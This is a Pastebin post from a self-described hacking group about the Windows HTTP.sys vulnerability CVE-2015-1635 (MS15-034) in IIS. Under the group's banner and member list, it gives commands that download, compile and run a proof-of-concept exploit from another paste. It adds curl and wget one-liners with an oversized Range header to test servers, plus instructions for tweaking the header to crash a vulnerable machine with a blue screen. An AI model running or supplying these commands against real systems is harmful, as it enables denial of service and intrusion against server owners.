Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- We are...
- _____ _________
- / _ \ ____ ____ ____ / _____/ ____ ____
- / /_\ \ / \ / _ \ / \ \_____ \_/ __ \_/ ___\
- / | \ | ( <_> ) | \/ \ ___/\ \___
- \____|__ /___| /\____/|___| /_______ /\___ >\___ >
- \/ \/ \/ \/ \/ \/
- //Laughing at your security since 2012*
- =================================================================================================
- Official Members: Mrlele - AnonSec666 - 3r3b0s - d3f4ult - MS08-067 - Hannaichi - ap3x h4x0r -
- Gh05tFr3ak - OverKiller - Cyb3r Shzz0r - Pr3d4T0r - Mr. BlackList - AN0NT0XIC - Ny0g3n
- =================================================================================================
- (CVE-2015-1635) Windows 7, Windows Server 2008 R2, Windows 8, Windows Server 2012, Windows 8.1,
- and Windows Server 2012 R2 systems running Microsoft's IIS web server are affected. The component
- at fault is HTTP.sys, a kernel-level driver that forwards requests for webpages and the like to
- the user-space server software, and caches static files.
- Microsoft Window - HTTP.sys PoC (MS15-034)
- http://www.exploit-db.com/exploits/36773/
- wget http://pastebin.com/raw.php?i=ypURDPc4 -O HTTPsys.c
- gcc HTTPsys.c -o HTTPsys
- ./HTTPsys
- To check if vuln/exploit using curl:
- curl -v [ipaddress]/static.png -H "Host: test" -H "Range: bytes=0-18446744073709551615"
- Change 0- to 20- to blue-screen-of-death a vulnerable box.
- With Wget:
- wget -O /dev/null --header="Range: 0-18446744073709551615" http://[ip address]/
- [+] Sources [+]
- https://technet.microsoft.com/en-us/library/security/ms15-034.aspx
- https://support.microsoft.com/en-us/kb/3042553
- http://www.theregister.co.uk/2015/04/16/http_sys_exploit_wild_ms15_034/
- http://www.exploit-db.com/exploits/36773/
- Twitter: @rhcp011235
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement